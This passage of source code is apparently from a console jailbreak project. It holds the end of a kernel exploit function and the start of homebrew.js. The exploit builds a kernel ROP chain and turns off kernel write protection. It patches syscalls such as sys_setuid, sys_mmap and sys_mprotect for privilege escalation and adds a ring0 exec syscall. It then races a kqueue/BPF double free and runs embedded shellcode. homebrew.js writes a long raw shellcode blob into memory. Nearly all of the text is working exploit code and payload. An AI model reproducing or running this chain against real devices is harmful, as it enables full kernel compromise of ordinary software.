201 |       krop.push(window.gadgets["mov rax, [rax]"]);
202 |       krop.push(window.gadgets["pop rsi"]);
203 |       krop.push(offset);
204 |       krop.push(window.gadgets["add rax, rsi"]);
205 |       krop.push(window.gadgets["mov rdi, rax"]);
206 |       krop.push(window.gadgets["pop rax"]);
207 |       krop.push(kscratch);
208 |       krop.push(window.gadgets["mov rax, [rax]"]);
209 |       krop.push(window.gadgets["pop rsi"]);
210 |       krop.push(offset2);
211 |       krop.push(window.gadgets["add rax, rsi"]);
212 |       krop.push(window.gadgets["mov [rdi], rax"]);
213 |     }
214 | 
215 |     p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
216 |     p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
217 |     p.write8(kscratch.add32(0x18), kscratch);
218 | 
219 |     krop.push(window.gadgets["pop rdi"]);
220 |     krop.push(kscratch.add32(0x18));
221 |     krop.push(window.gadgets["mov rbp, rsp"]);
222 | 
223 |     var rboff = topofchain - krop.count * 8 + 0x28;
224 | 
225 |     krop.push(offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
226 |     krop.push(window.gadgets["pop rax"]);
227 |     krop.push(rboff);
228 |     krop.push(window.gadgets["add rdi, rax"]);
229 | 
230 |     krop.push(window.gadgets["mov rax, [rdi]"]);
231 |     krop.push(window.gadgets["pop rsi"]);
232 |     krop.push(0x2FA);
233 |     krop.push(window.gadgets["add rax, rsi"]);
234 |     krop.push(window.gadgets["mov [rdi], rax"]);
235 | 
236 |     var shellbuf = p.malloc32(0x1000);
237 | 
238 |     // Save context of cr0 register
239 |     krop.push(window.gadgets["pop rdi"]); // save address in usermode
240 |     krop.push(kscratch);
241 |     krop.push(window.gadgets["mov [rdi], rax"]);
242 |     krop.push(window.gadgets["pop rsi"]);
243 |     krop.push(0xC54B4);
244 |     krop.push(window.gadgets["add rax, rsi"]);
245 |     krop.push(window.gadgets["pop rdi"]);
246 |     krop.push(kscratch.add32(0x08));
247 |     krop.push(window.gadgets["mov [rdi], rax"]);
248 |     krop.push(window.gadgets["jmp rax"]);
249 |     krop.push(window.gadgets["pop rdi"]); // save cr0
250 |     krop.push(kscratch.add32(0x10));
251 | 
252 |     // Disable kernel write protection for .text
253 |     krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
254 |     krop.push(window.gadgets["pop rsi"]);
255 |     krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
256 |     krop.push(window.gadgets["and rax, rsi"]);
257 |     krop.push(window.gadgets["mov rdx, rax"]);
258 |     krop.push(window.gadgets["pop rax"]);
259 |     krop.push(kscratch.add32(8));
260 |     krop.push(window.gadgets["mov rax, [rax]"]);
261 |     krop.push(window.gadgets["pop rsi"]);
262 |     krop.push(0x9);
263 |     krop.push(window.gadgets["add rax, rsi"]);
264 |     krop.push(window.gadgets["mov rdi, rax"]);
265 |     krop.push(window.gadgets["mov rax, rdx"]);
266 |     krop.push(window.gadgets["jmp rdi"]);
267 | 
268 |     krop.push(window.gadgets["pop rax"]);
269 |     krop.push(kscratch);
270 |     krop.push(window.gadgets["mov rax, [rax]"]);
271 |     krop.push(window.gadgets["pop rsi"]);
272 |     krop.push(0x3609A);
273 |     krop.push(window.gadgets["add rax, rsi"]);
274 |     krop.push(window.gadgets["mov rax, [rax]"]);
275 |     krop.push(window.gadgets["pop rdi"]);
276 |     krop.push(kscratch.add32(0x330));
277 |     krop.push(window.gadgets["mov [rdi], rax"]);
278 | 
279 |     // Patch sys_mprotect: Allow RWX mapping
280 |     patch_mprotect = new int64(0x9090FA38, 0x90909090);
281 |     kpatch(0x3609A, patch_mprotect);
282 | 
283 |     // Patch bpf_cdevsw: add back in bpfwrite() implementation for kernel primitives
284 |     kpatch(0x133C344, shellbuf);
285 | 
286 |     // Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
287 |     var patch_sys_setuid_offset = new int64(0xFFEE6F06, 0xFFFFFFFF);
288 |     var patch_sys_setuid = new int64(0x000000B8, 0xC4894100);
289 |     kpatch(patch_sys_setuid_offset, patch_sys_setuid);
290 | 
291 |     // Patch amd64_syscall: syscall instruction allowed anywhere
292 |     var patch_amd64_syscall_offset1 = new int64(0xFFE92927, 0xFFFFFFFF);
293 |     var patch_amd64_syscall_offset2 = new int64(0xFFE92945, 0xFFFFFFFF);
294 |     var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49);
295 |     var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090);
296 |     kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
297 |     kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
298 | 
299 |     // Patch: sys_mmap: allow RWX mapping from anywhere
300 |     var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF);
301 |     var patch_sys_mmap = new int64(0x37B64037, 0x3145C031);
302 |     kpatch(patch_sys_mmap_offset, patch_sys_mmap);
303 | 
304 |     // Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
305 |     var patch_sys_dynlib_dlsym_1 = new int64(0x000000E9, 0x8B489000);
306 |     var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090);
307 |     kpatch(0xCA3CE,  patch_sys_dynlib_dlsym_1);
308 |     kpatch(0x144AB4, patch_sys_dynlib_dlsym_2);
309 | 
310 |     // Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
311 |     var patch_sys_exec_1 = new int64(0x00F0ECB4, 0);
312 |     var patch_sys_exec_2A = new int64(0x00F0ECBC, 0);
313 |     var patch_sys_exec_2B = new int64(0xFFEA58F4, 0xFFFFFFFF);
314 |     var patch_sys_exec_3 = new int64(0x00F0ECDC, 0);
315 |     var patch_sys_exec_param1 = new int64(0x02, 0);
316 |     var patch_sys_exec_param3 = new int64(0, 1);
317 |     kpatch(patch_sys_exec_1, patch_sys_exec_param1);
318 |     kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
319 |     kpatch(patch_sys_exec_3, patch_sys_exec_param3);
320 | 
321 |     // Enable kernel write protection for .text
322 |     krop.push(window.gadgets["pop rax"]);
323 |     krop.push(kscratch.add32(0x08));
324 |     krop.push(window.gadgets["mov rax, [rax]"]);
325 |     krop.push(window.gadgets["pop rsi"]);
326 |     krop.push(0x09);
327 |     krop.push(window.gadgets["add rax, rsi"]);
328 |     krop.push(window.gadgets["mov rdi, rax"]);
329 |     krop.push(window.gadgets["pop rax"]);
330 |     krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
331 |     krop.push(window.gadgets["mov rax, [rax]"]);
332 |     krop.push(window.gadgets["jmp rdi"]);
333 | 
334 |     krop.push(offsetToWebKit(0x5CDB9)); // Clean up stack
335 |     krop.push(kscratch.add32(0x1000));
336 | 
337 |     var kq = p.malloc32(0x10);
338 |     var kev = p.malloc32(0x100);
339 |     kev.backing[0] = sock;
340 |     kev.backing[2] = 0x1ffff;
341 |     kev.backing[3] = 1;
342 |     kev.backing[4] = 5;
343 | 
344 |     // Shellcode to clean up memory
345 |     var shcode = [0x00008be9, 0x90909000, 0x90909090, 0x90909090, 0x0082b955, 0x8948c000, 0x415641e5, 0x53544155, 0x8949320f, 0xbbc089d4, 0x00000100, 0x20e4c149, 0x48c40949, 0x0096058d, 0x8d490000, 0xfe402494, 0x8d4dffff, 0xe09024b4, 0x8d4d0010, 0x5e8024ac, 0x81490043, 0x4b7160c4, 0x10894801, 0x00401f0f, 0x000002ba, 0xe6894c00, 0x000800bf, 0xd6ff4100, 0x393d8d48, 0x48000000, 0xc031c689, 0x83d5ff41, 0xdc7501eb, 0x41c0315b, 0x415d415c, 0x90c35d5e, 0x3d8d4855, 0xffffff78, 0x8948f631, 0x00e95de5, 0x48000000, 0x000bc0c7, 0x89490000, 0xc3050fca, 0x6c616d6b, 0x3a636f6c, 0x25783020, 0x6c363130, 0x00000a58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
346 |     for (var i = 0; i < shcode.length; i++) {
347 |       shellbuf.backing[i] = shcode[i];
348 |     }
349 | 
350 |     // RACE!
351 |     var iters = 0;
352 |     start1();
353 |     while (1) {
354 |       race.count = 0;
355 | 
356 |       // Create a kqueue
357 |       race.push(window.syscalls[362]);
358 |       race.push(window.gadgets["pop rdi"]);
359 |       race.push(kq);
360 |       race.push(window.gadgets["mov [rdi], rax"]);
361 | 
362 |       // Race against the other thread
363 |       race.push(window.gadgets["ret"]);
364 |       race.push(window.gadgets["ret"]);
365 |       race.push(window.gadgets["ret"]);
366 |       race.push(window.gadgets["ret"]);
367 |       race.push_write8(loop1, interrupt1);
368 |       race.push(window.gadgets["pop rdi"]);
369 |       race.push(fd);
370 |       race.push(window.gadgets["pop rsi"]);
371 |       race.push(0x8010427B);
372 |       race.push(window.gadgets["pop rdx"]);
373 |       race.push(bpf_valid_prog);
374 |       race.push(window.syscalls[54]);
375 | 
376 |       // Attempt to trigger double free()
377 |       race.push(window.gadgets["pop rax"]);
378 |       race.push(kq);
379 |       race.push(window.gadgets["mov rax, [rax]"]);
380 |       race.push(window.gadgets["mov rdi, rax"]);
381 |       race.push(window.gadgets["pop rsi"]);
382 |       race.push(kev);
383 |       race.push(window.gadgets["pop rdx"]);
384 |       race.push(1);
385 |       race.push(window.gadgets["pop rcx"]);
386 |       race.push(0);
387 |       race.push(window.gadgets["pop r8"]);
388 |       race.push(0);
389 |       race.push(window.syscalls[363]);
390 | 
391 |       // Spray via ioctl
392 |       race.push(window.gadgets["pop rdi"]);
393 |       race.push(fd1);
394 |       race.push(window.gadgets["pop rsi"]);
395 |       race.push(0x8010427B);
396 |       race.push(window.gadgets["pop rdx"]);
397 |       race.push(bpf_spray_prog);
398 |       race.push(window.syscalls[54]);
399 | 
400 |       // Close the poisoned kqueue and run the kROP chain!
401 |       race.push(window.gadgets["pop rax"]);
402 |       race.push(kq);
403 |       race.push(window.gadgets["mov rax, [rax]"]);
404 |       race.push(window.gadgets["mov rdi, rax"]);
405 |       race.push(window.syscalls[6]);
406 |       iters++;
407 | 
408 |       // Gotta go fast!
409 |       race.run();
410 |       if (kscratch.backing[0] != 0) {
411 |         // Hey, we won!
412 | 
413 |         // Clean up memory
414 |         p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
415 |         p.fcall(shellbuf);
416 | 
417 |         // Refresh to a clean page
418 |         location.reload();
419 | 
420 |         return true;
421 |       }
422 |     }
423 |   } catch(ex) {
424 |     fail(ex)
425 |   }
426 | 
427 |   // failed
428 |   return false;
429 | }
430 | 
431 | kernExploit();
432 | 


--------------------------------------------------------------------------------
/homebrew.js:
--------------------------------------------------------------------------------
   1 | function writeHomebrewEN(p, addr) { 
   2 |   p.write4(addr.add32(0x00000000), 0x0002abe9);
   3 |   p.write4(addr.add32(0x00000004), 0x41574100);
   4 |   p.write4(addr.add32(0x00000008), 0x41554156);
   5 |   p.write4(addr.add32(0x0000000c), 0x48535554);
   6 |   p.write4(addr.add32(0x00000010), 0xb918ec83);
   7 |   p.write4(addr.add32(0x00000014), 0xc0000082);
   8 |   p.write4(addr.add32(0x00000018), 0x8948320f);
   9 |   p.write4(addr.add32(0x0000001c), 0x568b48d1);
  10 |   p.write4(addr.add32(0x00000020), 0xe1c14808);
  11 |   p.write4(addr.add32(0x00000024), 0xc8094820);
  12 |   p.write4(addr.add32(0x00000028), 0xb0b88d48);
  13 |   p.write4(addr.add32(0x0000002c), 0x48022cb3);
  14 |   p.write4(addr.add32(0x00000030), 0x8948d285);
  15 |   p.write4(addr.add32(0x00000034), 0x0f08247c);
  16 |   p.write4(addr.add32(0x00000038), 0x00014b84);
  17 |   p.write4(addr.add32(0x0000003c), 0x2a8b4800);
  18 |   p.write4(addr.add32(0x00000040), 0x08628b4c);
  19 |   p.write4(addr.add32(0x00000044), 0x0fed8548);
  20 |   p.write4(addr.add32(0x00000048), 0x00014084);
  21 |   p.write4(addr.add32(0x0000004c), 0xfc834900);
  22 |   p.write4(addr.add32(0x00000050), 0x36860f07);
  23 |   p.write4(addr.add32(0x00000054), 0x48000001);
  24 |   p.write4(addr.add32(0x00000058), 0x414430ba);
  25 |   p.write4(addr.add32(0x0000005c), 0x41594c4f);
  26 |   p.write4(addr.add32(0x00000060), 0x55394850);
  27 |   p.write4(addr.add32(0x00000064), 0x22850f00);
  28 |   p.write4(addr.add32(0x00000068), 0x4c000001);
  29 |   p.write4(addr.add32(0x0000006c), 0xfe40a88d);
  30 |   p.write4(addr.add32(0x00000070), 0x8d4cffff);
  31 |   p.write4(addr.add32(0x00000074), 0x2e2ed0b0);
  32 |   p.write4(addr.add32(0x00000078), 0x988d4800);
  33 |   p.write4(addr.add32(0x0000007c), 0x00b5ed70);
  34 |   p.write4(addr.add32(0x00000080), 0xc7200f41);
  35 |   p.write4(addr.add32(0x00000084), 0x48f8894c);
  36 |   p.write4(addr.add32(0x00000088), 0xfeffff25);
  37 |   p.write4(addr.add32(0x0000008c), 0xc0220fff);
  38 |   p.write4(addr.add32(0x00000090), 0x00baf631);
  39 |   p.write4(addr.add32(0x00000094), 0x48000040);
  40 |   p.write4(addr.add32(0x00000098), 0x15ffdf89);
  41 |   p.write4(addr.add32(0x0000009c), 0x000026a0);
  42 |   p.write4(addr.add32(0x000000a0), 0x48e2894c);
  43 |   p.write4(addr.add32(0x000000a4), 0x8948ee89);
  44 |   p.write4(addr.add32(0x000000a8), 0x8115ffdf);
  45 |   p.write4(addr.add32(0x000000ac), 0x41000025);
  46 |   p.write4(addr.add32(0x000000b0), 0x30d485c6);
  47 |   p.write4(addr.add32(0x000000b4), 0x4aeb002e);
  48 |   p.write4(addr.add32(0x000000b8), 0xff23948d);
  49 |   p.write4(addr.add32(0x000000bc), 0x4800003f);
  50 |   p.write4(addr.add32(0x000000c0), 0x8b48de89);
  51 |   p.write4(addr.add32(0x000000c4), 0x4808247c);
  52 |   p.write4(addr.add32(0x000000c8), 0xc000e281);
  53 |   p.write4(addr.add32(0x000000cc), 0x8148ffff);
  54 |   p.write4(addr.add32(0x000000d0), 0xffc000e6);
  55 |   p.write4(addr.add32(0x000000d4), 0x0007b9ff);
  56 |   p.write4(addr.add32(0x000000d8), 0xff410000);
  57 |   p.write4(addr.add32(0x000000dc), 0x85c641d6);
  58 |   p.write4(addr.add32(0x000000e0), 0x002e30d4);
  59 |   p.write4(addr.add32(0x000000e4), 0x458b4875);
  60 |   p.write4(addr.add32(0x000000e8), 0xc0854808);
  61 |   p.write4(addr.add32(0x000000ec), 0x5e9c0e75);
  62 |   p.write4(addr.add32(0x000000f0), 0x458b48fa);
  63 |   p.write4(addr.add32(0x000000f4), 0xc0854810);
  64 |   p.write4(addr.add32(0x000000f8), 0x36eb2c75);
  65 |   p.write4(addr.add32(0x000000fc), 0x10508d48);
  66 |   p.write4(addr.add32(0x00000100), 0x49e80148);
  67 |   p.write4(addr.add32(0x00000104), 0xe672d439);
  68 |   p.write4(addr.add32(0x00000108), 0x08488b48);
  69 |   p.write4(addr.add32(0x0000010c), 0x74c98548);
  70 |   p.write4(addr.add32(0x00000110), 0x108b48dd);
  71 |   p.write4(addr.add32(0x00000114), 0x74d28548);
  72 |   p.write4(addr.add32(0x00000118), 0xea014cd5);
  73 |   p.write4(addr.add32(0x0000011c), 0x10c08348);
  74 |   p.write4(addr.add32(0x00000120), 0x0b148948);
  75 |   p.write4(addr.add32(0x00000124), 0x8d48e2eb);
  76 |   p.write4(addr.add32(0x00000128), 0x01481050);
  77 |   p.write4(addr.add32(0x0000012c), 0xd43949e8);
  78 |   p.write4(addr.add32(0x00000130), 0x9d563673);
  79 |   p.write4(addr.add32(0x00000134), 0xc7220f41);
  80 |   p.write4(addr.add32(0x00000138), 0x18458b48);
  81 |   p.write4(addr.add32(0x0000013c), 0x76c43949);
  82 |   p.write4(addr.add32(0x00000140), 0xc0854805);
  83 |   p.write4(addr.add32(0x00000144), 0xc0312c75);
  84 |   p.write4(addr.add32(0x00000148), 0x8b4848eb);
  85 |   p.write4(addr.add32(0x0000014c), 0x85480848);
  86 |   p.write4(addr.add32(0x00000150), 0x4cdf74c9);
  87 |   p.write4(addr.add32(0x00000154), 0x8948ea01);
  88 |   p.write4(addr.add32(0x00000158), 0xd72948df);
  89 |   p.write4(addr.add32(0x0000015c), 0x10c08348);
  90 |   p.write4(addr.add32(0x00000160), 0x0f4c8d48);
  91 |   p.write4(addr.add32(0x00000164), 0x014a89fb);
  92 |   p.write4(addr.add32(0x00000168), 0x48108b48);
  93 |   p.write4(addr.add32(0x0000016c), 0xda75d285);
  94 |   p.write4(addr.add32(0x00000170), 0x8348c0eb);
  95 |   p.write4(addr.add32(0x00000174), 0x8d4818c4);
  96 |   p.write4(addr.add32(0x00000178), 0x315b0314);
  97 |   p.write4(addr.add32(0x0000017c), 0x5c415dc0);
  98 |   p.write4(addr.add32(0x00000180), 0x5e415d41);
  99 |   p.write4(addr.add32(0x00000184), 0xe2ff5f41);
 100 |   p.write4(addr.add32(0x00000188), 0xebffc883);
 101 |   p.write4(addr.add32(0x0000018c), 0xfffeb805);
 102 |   p.write4(addr.add32(0x00000190), 0x8348ffff);
 103 |   p.write4(addr.add32(0x00000194), 0x5d5b18c4);
 104 |   p.write4(addr.add32(0x00000198), 0x5d415c41);
 105 |   p.write4(addr.add32(0x0000019c), 0x5f415e41);
 106 |   p.write4(addr.add32(0x000001a0), 0x8b4853c3);
 107 |   p.write4(addr.add32(0x000001a4), 0x82b90847);
 108 |   p.write4(addr.add32(0x000001a8), 0x48c00000);
 109 |   p.write4(addr.add32(0x000001ac), 0x4c40708b);
 110 |   p.write4(addr.add32(0x000001b0), 0x0f48408b);
 111 |   p.write4(addr.add32(0x000001b4), 0xd1894832);
 112 |   p.write4(addr.add32(0x000001b8), 0x18968b48);
 113 |   p.write4(addr.add32(0x000001bc), 0x48000001);
 114 |   p.write4(addr.add32(0x000001c0), 0x4820e1c1);
 115 |   p.write4(addr.add32(0x000001c4), 0x8d48c809);
 116 |   p.write4(addr.add32(0x000001c8), 0xfffe4098);
 117 |   p.write4(addr.add32(0x000001cc), 0x0446c7ff);
 118 |   p.write4(addr.add32(0x000001d0), 0x00000000);
 119 |   p.write4(addr.add32(0x000001d4), 0x000846c7);
 120 |   p.write4(addr.add32(0x000001d8), 0x48000000);
 121 |   p.write4(addr.add32(0x000001dc), 0xc7ffc983);
 122 |   p.write4(addr.add32(0x000001e0), 0x00001446);
 123 |   p.write4(addr.add32(0x000001e4), 0x05480000);
 124 |   p.write4(addr.add32(0x000001e8), 0x004f8b50);
 125 |   p.write4(addr.add32(0x000001ec), 0x000002c7);
 126 |   p.write4(addr.add32(0x000001f0), 0x8b480000);
 127 |   p.write4(addr.add32(0x000001f4), 0x0986a093);
 128 |   p.write4(addr.add32(0x000001f8), 0x56894801);
 129 |   p.write4(addr.add32(0x000001fc), 0x48f63130);
 130 |   p.write4(addr.add32(0x00000200), 0x1a70938b);
 131 |   p.write4(addr.add32(0x00000204), 0x8949022c);
 132 |   p.write4(addr.add32(0x00000208), 0x89492050);
 133 |   p.write4(addr.add32(0x0000020c), 0x31451850);
 134 |   p.write4(addr.add32(0x00000210), 0x978b48c0);
 135 |   p.write4(addr.add32(0x00000214), 0x00000130);
 136 |   p.write4(addr.add32(0x00000218), 0x0013bf48);
 137 |   p.write4(addr.add32(0x0000021c), 0x00000000);
 138 |   p.write4(addr.add32(0x00000220), 0x89483801);
 139 |   p.write4(addr.add32(0x00000224), 0x8948604a);
 140 |   p.write4(addr.add32(0x00000228), 0x00bf587a);
 141 |   p.write4(addr.add32(0x0000022c), 0x483c0400);
 142 |   p.write4(addr.add32(0x00000230), 0x31684a89);
 143 |   p.write4(addr.add32(0x00000234), 0xffd231c9);
 144 |   p.write4(addr.add32(0x00000238), 0xc0200fd0);
 145 |   p.write4(addr.add32(0x0000023c), 0x48c28948);
 146 |   p.write4(addr.add32(0x00000240), 0xffffe281);
 147 |   p.write4(addr.add32(0x00000244), 0x220ffffe);
 148 |   p.write4(addr.add32(0x00000248), 0x868b80c2);
 149 |   p.write4(addr.add32(0x0000024c), 0x1401cd06);
 150 |   p.write4(addr.add32(0x00000250), 0x904883c7);
 151 |   p.write4(addr.add32(0x00000254), 0x0000004f);
 152 |   p.write4(addr.add32(0x00000258), 0x8b800000);
 153 |   p.write4(addr.add32(0x0000025c), 0x01cd06a9);
 154 |   p.write4(addr.add32(0x00000260), 0xaa8b8003);
 155 |   p.write4(addr.add32(0x00000264), 0x0101cd06);
 156 |   p.write4(addr.add32(0x00000268), 0x06c88b80);
 157 |   p.write4(addr.add32(0x0000026c), 0xc70101cd);
 158 |   p.write4(addr.add32(0x00000270), 0x4fa15c83);
 159 |   p.write4(addr.add32(0x00000274), 0x00000000);
 160 |   p.write4(addr.add32(0x00000278), 0x83c76600);
 161 |   p.write4(addr.add32(0x0000027c), 0x01cd068c);
 162 |   p.write4(addr.add32(0x00000280), 0xc7668101);
 163 |   p.write4(addr.add32(0x00000284), 0x36b7fc83);
 164 |   p.write4(addr.add32(0x00000288), 0xc7810102);
 165 |   p.write4(addr.add32(0x0000028c), 0x6a270083);
 166 |   p.write4(addr.add32(0x00000290), 0xc3c03100);
 167 |   p.write4(addr.add32(0x00000294), 0xb083c790);
 168 |   p.write4(addr.add32(0x00000298), 0xb00064b2);
 169 |   p.write4(addr.add32(0x0000029c), 0xc790c301);
 170 |   p.write4(addr.add32(0x000002a0), 0x64b2d083);
 171 |   p.write4(addr.add32(0x000002a4), 0xc301b000);
 172 |   p.write4(addr.add32(0x000002a8), 0xc0220f90);
 173 |   p.write4(addr.add32(0x000002ac), 0xc35bc031);
 174 |   p.write4(addr.add32(0x000002b0), 0x18ec8348);
 175 |   p.write4(addr.add32(0x000002b4), 0x000096e8);
 176 |   p.write4(addr.add32(0x000002b8), 0x0469e800);
 177 |   p.write4(addr.add32(0x000002bc), 0xf6310000);
 178 |   p.write4(addr.add32(0x000002c0), 0xda3d8d48);
 179 |   p.write4(addr.add32(0x000002c4), 0xe8fffffe);
 180 |   p.write4(addr.add32(0x000002c8), 0x00000077);
 181 |   p.write4(addr.add32(0x000002cc), 0x0c74c085);
 182 |   p.write4(addr.add32(0x000002d0), 0x15ffc031);
 183 |   p.write4(addr.add32(0x000002d4), 0x000022a8);
 184 |   p.write4(addr.add32(0x000002d8), 0x4aeb008b);
 185 |   p.write4(addr.add32(0x000002dc), 0x69058d48);
 186 |   p.write4(addr.add32(0x000002e0), 0x48000009);
 187 |   p.write4(addr.add32(0x000002e4), 0x8b240489);
 188 |   p.write4(addr.add32(0x000002e8), 0x001e0f05);
 189 |   p.write4(addr.add32(0x000002ec), 0x44894800);
 190 |   p.write4(addr.add32(0x000002f0), 0xc0310824);
 191 |   p.write4(addr.add32(0x000002f4), 0x228615ff);
 192 |   p.write4(addr.add32(0x000002f8), 0x89480000);
 193 |   p.write4(addr.add32(0x000002fc), 0x3d8d48e6);
 194 |   p.write4(addr.add32(0x00000300), 0xfffffd01);
 195 |   p.write4(addr.add32(0x00000304), 0x000000c7);
 196 |   p.write4(addr.add32(0x00000308), 0x34e80000);
 197 |   p.write4(addr.add32(0x0000030c), 0x85000000);
 198 |   p.write4(addr.add32(0x00000310), 0x310475c0);
 199 |   p.write4(addr.add32(0x00000314), 0x310febc0);
 200 |   p.write4(addr.add32(0x00000318), 0x6115ffc0);
 201 |   p.write4(addr.add32(0x0000031c), 0x83000022);
 202 |   p.write4(addr.add32(0x00000320), 0xef740038);
 203 |   p.write4(addr.add32(0x00000324), 0x8348aaeb);
 204 |   p.write4(addr.add32(0x00000328), 0x48c318c4);
 205 |   p.write4(addr.add32(0x0000032c), 0x0025c0c7);
 206 |   p.write4(addr.add32(0x00000330), 0xe7e90000);
 207 |   p.write4(addr.add32(0x00000334), 0x48000008);
 208 |   p.write4(addr.add32(0x00000338), 0x0036c0c7);
 209 |   p.write4(addr.add32(0x0000033c), 0xdbe90000);
 210 |   p.write4(addr.add32(0x00000340), 0x48000008);
 211 |   p.write4(addr.add32(0x00000344), 0x000bc0c7);
 212 |   p.write4(addr.add32(0x00000348), 0xcfe90000);
 213 |   p.write4(addr.add32(0x0000034c), 0x48000008);
 214 |   p.write4(addr.add32(0x00000350), 0x4808ec83);
 215 |   p.write4(addr.add32(0x00000354), 0x21ae358d);
 216 |   p.write4(addr.add32(0x00000358), 0x8d480000);
 217 |   p.write4(addr.add32(0x0000035c), 0x001d9f3d);
 218 |   p.write4(addr.add32(0x00000360), 0x05c74800);
 219 |   p.write4(addr.add32(0x00000364), 0x00002214);
 220 |   p.write4(addr.add32(0x00000368), 0x00000000);
 221 |   p.write4(addr.add32(0x0000036c), 0x000399e8);
 222 |   p.write4(addr.add32(0x00000370), 0x74c08500);
 223 |   p.write4(addr.add32(0x00000374), 0x358d482a);
 224 |   p.write4(addr.add32(0x00000378), 0x0000218c);
 225 |   p.write4(addr.add32(0x0000037c), 0x8c3d8d48);
 226 |   p.write4(addr.add32(0x00000380), 0xe800001d);
 227 |   p.write4(addr.add32(0x00000384), 0x00000382);
 228 |   p.write4(addr.add32(0x00000388), 0x1374c085);
 229 |   p.write4(addr.add32(0x0000038c), 0x75358d48);
 230 |   p.write4(addr.add32(0x00000390), 0x48000021);
 231 |   p.write4(addr.add32(0x00000394), 0x1d883d8d);
 232 |   p.write4(addr.add32(0x00000398), 0x6be80000);
 233 |   p.write4(addr.add32(0x0000039c), 0x8b000003);
 234 |   p.write4(addr.add32(0x000003a0), 0x0021633d);
 235 |   p.write4(addr.add32(0x000003a4), 0x158d4800);
 236 |   p.write4(addr.add32(0x000003a8), 0x00002164);
 237 |   p.write4(addr.add32(0x000003ac), 0x82358d48);
 238 |   p.write4(addr.add32(0x000003b0), 0xe800001d);
 239 |   p.write4(addr.add32(0x000003b4), 0x0000033a);
 240 |   p.write4(addr.add32(0x000003b8), 0x214a3d8b);
 241 |   p.write4(addr.add32(0x000003bc), 0x8d480000);
 242 |   p.write4(addr.add32(0x000003c0), 0x00218315);
 243 |   p.write4(addr.add32(0x000003c4), 0x358d4800);
 244 |   p.write4(addr.add32(0x000003c8), 0x00001d7b);
 245 |   p.write4(addr.add32(0x000003cc), 0x000321e8);
 246 |   p.write4(addr.add32(0x000003d0), 0x313d8b00);
 247 |   p.write4(addr.add32(0x000003d4), 0x48000021);
 248 |   p.write4(addr.add32(0x000003d8), 0x21a2158d);
 249 |   p.write4(addr.add32(0x000003dc), 0x8d480000);
 250 |   p.write4(addr.add32(0x000003e0), 0x001d7335);
 251 |   p.write4(addr.add32(0x000003e4), 0x0308e800);
 252 |   p.write4(addr.add32(0x000003e8), 0x3d8b0000);
 253 |   p.write4(addr.add32(0x000003ec), 0x00002118);
 254 |   p.write4(addr.add32(0x000003f0), 0x69158d48);
 255 |   p.write4(addr.add32(0x000003f4), 0x48000021);
 256 |   p.write4(addr.add32(0x000003f8), 0x1d62358d);
 257 |   p.write4(addr.add32(0x000003fc), 0xefe80000);
 258 |   p.write4(addr.add32(0x00000400), 0x8b000002);
 259 |   p.write4(addr.add32(0x00000404), 0x0020ff3d);
 260 |   p.write4(addr.add32(0x00000408), 0x158d4800);
 261 |   p.write4(addr.add32(0x0000040c), 0x00002190);
 262 |   p.write4(addr.add32(0x00000410), 0x58358d48);
 263 |   p.write4(addr.add32(0x00000414), 0xe800001d);
 264 |   p.write4(addr.add32(0x00000418), 0x000002d6);
 265 |   p.write4(addr.add32(0x0000041c), 0x20e63d8b);
 266 |   p.write4(addr.add32(0x00000420), 0x8d480000);
 267 |   p.write4(addr.add32(0x00000424), 0x00219f15);
 268 |   p.write4(addr.add32(0x00000428), 0x358d4800);
 269 |   p.write4(addr.add32(0x0000042c), 0x00001d58);
 270 |   p.write4(addr.add32(0x00000430), 0x0002bde8);
 271 |   p.write4(addr.add32(0x00000434), 0xcd3d8b00);
 272 |   p.write4(addr.add32(0x00000438), 0x48000020);
 273 |   p.write4(addr.add32(0x0000043c), 0x210e158d);
 274 |   p.write4(addr.add32(0x00000440), 0x8d480000);
 275 |   p.write4(addr.add32(0x00000444), 0x001d5d35);
 276 |   p.write4(addr.add32(0x00000448), 0x02a4e800);
 277 |   p.write4(addr.add32(0x0000044c), 0x3d8b0000);
 278 |   p.write4(addr.add32(0x00000450), 0x000020b4);
 279 |   p.write4(addr.add32(0x00000454), 0x3d158d48);
 280 |   p.write4(addr.add32(0x00000458), 0x48000021);
 281 |   p.write4(addr.add32(0x0000045c), 0x1d5d358d);
 282 |   p.write4(addr.add32(0x00000460), 0x8be80000);
 283 |   p.write4(addr.add32(0x00000464), 0x8b000002);
 284 |   p.write4(addr.add32(0x00000468), 0x00209b3d);
 285 |   p.write4(addr.add32(0x0000046c), 0x158d4800);
 286 |   p.write4(addr.add32(0x00000470), 0x0000217c);
 287 |   p.write4(addr.add32(0x00000474), 0x52358d48);
 288 |   p.write4(addr.add32(0x00000478), 0xe800001d);
 289 |   p.write4(addr.add32(0x0000047c), 0x00000272);
 290 |   p.write4(addr.add32(0x00000480), 0x20823d8b);
 291 |   p.write4(addr.add32(0x00000484), 0x8d480000);
 292 |   p.write4(addr.add32(0x00000488), 0x0020e315);
 293 |   p.write4(addr.add32(0x0000048c), 0x358d4800);
 294 |   p.write4(addr.add32(0x00000490), 0x00001d47);
 295 |   p.write4(addr.add32(0x00000494), 0x000259e8);
 296 |   p.write4(addr.add32(0x00000498), 0x693d8b00);
 297 |   p.write4(addr.add32(0x0000049c), 0x48000020);
 298 |   p.write4(addr.add32(0x000004a0), 0x20ea158d);
 299 |   p.write4(addr.add32(0x000004a4), 0x8d480000);
